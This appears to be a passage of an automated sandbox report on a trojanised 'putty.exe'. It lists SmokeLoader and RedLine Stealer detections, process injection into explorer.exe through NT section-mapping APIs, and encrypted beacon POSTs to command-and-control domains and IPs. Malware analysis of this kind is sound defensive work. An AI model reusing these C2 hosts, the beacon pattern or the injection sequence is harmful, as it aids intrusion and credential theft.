                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            55 | 192.168.2.5 | 50032 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:32.910561085 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://nqrqvcheqmo.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 169
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:32.910592079 CET | 169 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be b5 50 33 8c
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)P3{d9C/+y>/(EtC;@4Z9?ESy<k|mF~nnM
                                            Dec 19, 2024 11:01:34.291301012 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:34 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            56 | 192.168.2.5 | 50033 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:34.421761990 CET | 278 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://fkdpjansght.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 145
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:34.421787977 CET | 145 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9c 3c 34 87
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)<4IBsnQ1/aC_S+H06T< qpy/"
                                            Dec 19, 2024 11:01:35.755727053 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            57 | 192.168.2.5 | 50034 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:39.873128891 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://viejsmtmgdxamty.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 234
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:39.873186111 CET | 234 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 87 10 74 91
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)t1yV+E"T/' F~oS30-*z$TM[rk~r*Z~T>{WWf>$fX!@PEbk$#ya)y?Ur{{^M[
                                            Dec 19, 2024 11:01:41.227861881 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:41 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            58 | 192.168.2.5 | 50035 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:41.715229988 CET | 288 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://quegfhrneryhjosy.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 338
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:41.715244055 CET | 338 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 83 45 6c 8b
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)EldD*1eH*B~m6s^@!x,uES]?lhS9Sbp{`,| r_wK6cul5k)9=UC?* cRa a
                                            Dec 19, 2024 11:01:43.091700077 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:42 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            59 | 192.168.2.5 | 50036 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:43.223036051 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ldbqkqcjtqgsavin.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 281
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:43.223078012 CET | 281 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 86 58 35 9c
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)X5wt[1tcr7-Ye-)"5*-VmFQL/{R1z!6vfLZfuU4b\{9+`Fqgv!Kf[Hdqu\{k~
                                            Dec 19, 2024 11:01:44.556948900 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:44 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            60 | 192.168.2.5 | 50037 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:01:49.725538015 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mmxcodigejxhlx.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 317
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:49.725586891 CET | 317 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e8 19 4e ba
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)N$I) h>",E^Xi2sf1jh~^^Wy~p1<cUDr$|&2#Bps'E]ihNjescrS57!W>'
                                            Dec 19, 2024 11:01:51.089430094 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:50 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0



                                            Target ID:0
                                            Start time:04:57:43
                                            Start date:19/12/2024
                                            Path:C:\Users\user\Desktop\putty.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\putty.exe"
                                            Imagebase:0x400000
                                            File size:245'760 bytes
                                            MD5 hash:3BBAC642557B0AB934ADDBAC0594561C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:04:57:51
                                            Start date:19/12/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff674740000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:4
                                            Start time:04:58:11
                                            Start date:19/12/2024
                                            Path:C:\Users\user\AppData\Roaming\hajefwb
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\hajefwb
                                            Imagebase:0x400000
                                            File size:245'760 bytes
                                            MD5 hash:3BBAC642557B0AB934ADDBAC0594561C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 47%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:05:00:01
                                            Start date:19/12/2024
                                            Path:C:\Users\user\AppData\Roaming\hajefwb
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\hajefwb
                                            Imagebase:0x400000
                                            File size:245'760 bytes
                                            MD5 hash:3BBAC642557B0AB934ADDBAC0594561C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:7.9%
                                              Dynamic/Decrypted Code Coverage:25.5%
                                              Signature Coverage:42.7%
                                              Total number of Nodes:192
                                              Total number of Limit Nodes:6

                                              Control-flow Graph

                                              APIs
                                              • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0041E87F
                                              • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041E8BA
                                              • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041E8C2
                                              • GetTimeFormatA.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0041E8F3
                                              • SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041E8FB
                                              • SetFileAttributesA.KERNEL32(00423370,00000000), ref: 0041E907
                                              • UnregisterWaitEx.KERNEL32(?,00000000), ref: 0041E917
                                              • SetLocaleInfoA.KERNEL32(00000000,00000000,00423380), ref: 0041E924
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: Format$AttributesBoostBuildCommDateFileFoldInfoLocalePriorityProcessStringTimeUnregisterWait
                                              • String ID:
                                              • API String ID: 3960956766-0
                                              • Opcode ID: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction ID: 6ae51a12dd7b4aebb8f82212809d29e946f68f2589e94ec055893a89d6f8ae5b
                                              • Opcode Fuzzy Hash: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction Fuzzy Hash: 20A1C0B5904200AFD320EF61ED84DAB77ADFB88304F40493EFA4692261DB789C45CB6D

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                              • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                              Control-flow Graph

                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                              • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                              Control-flow Graph

                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectView
                                              • String ID:
                                              • API String ID: 1652636561-0
                                              • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                              • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                              Control-flow Graph

                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                              • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                              • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                              Control-flow Graph

                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084CBA8
                                              • Module32First.KERNEL32(00000000,00000224), ref: 0084CBC8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_849000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: f3054302d36f515f05a4cafb62f90254cb4fd7f3b015d9c319aa3802630dbcf8
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 1BF06D32601B186FD7603AB9A88EA6A76ECFF49734F100969E642D24C0DA70E8458A61

                                              Control-flow Graph

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0094024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 0f2563c088c55e369c8b99a75913258639d7b91ed0990f4b75a4850b41703535
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: F1526774A00229DFDB64CF68C984BA8BBB1BF49304F1480D9E94DAB351DB34AE85DF14

                                              Control-flow Graph (graph image not preserved; single node 41e420-41e55e: GetModuleHandleW, GetProcAddress, VirtualProtect)
                                              APIs
                                              • GetModuleHandleW.KERNEL32(007FBE70), ref: 0041E4FC
                                              • GetProcAddress.KERNEL32(00000000,00428568), ref: 0041E539
                                              • VirtualProtect.KERNELBASE(007FBCB4,007FBE6C,00000040,?), ref: 0041E559
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProcProtectVirtual
                                              • String ID:
                                              • API String ID: 2099061454-0
                                              • Opcode ID: 5f792d3185b1dfe27c01431423dd3fc6cfa42d126e08d48e723e3642774d761e
                                              • Instruction ID: 73f69d7917680131017885dec632b363507af7a99e12a31d1a756d0ae7194df9
                                              • Opcode Fuzzy Hash: 5f792d3185b1dfe27c01431423dd3fc6cfa42d126e08d48e723e3642774d761e
                                              • Instruction Fuzzy Hash: D331E2107197C0EAE311DB74FC0476A3BA2AB65744F94906CD284873B1DBFE4596C72E

                                              Control-flow Graph (graph image not preserved; node 940e0f-940e24 calls SetErrorMode twice, then branches to 940e26 and 940e2b-940e2c)
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00940223,?,?), ref: 00940E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00940223,?,?), ref: 00940E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 263bd457605f750de3bf08e678698831de7a69c0df499e67b04a708b532cfd21
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 82D01232245228B7DB002A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA

                                              Control-flow Graph (graph image not preserved; single node 41e560-41e5bb: LoadLibraryA)
                                              APIs
                                              • LoadLibraryA.KERNELBASE(00428568,0041EAA6), ref: 0041E5B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: a2247281a0317d9ab3f27a11f04892dfecf0f6f02230e8de71191773789cf042
                                              • Instruction ID: 37f511d326cec085d92eed1722e052eb53f2ff336d789c620464cf2e2f778e48
                                              • Opcode Fuzzy Hash: a2247281a0317d9ab3f27a11f04892dfecf0f6f02230e8de71191773789cf042
                                              • Instruction Fuzzy Hash: 41F02E0574F2E0ECE722C77869097483F511722688FC840ED908016663CAAA02DBD73E
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
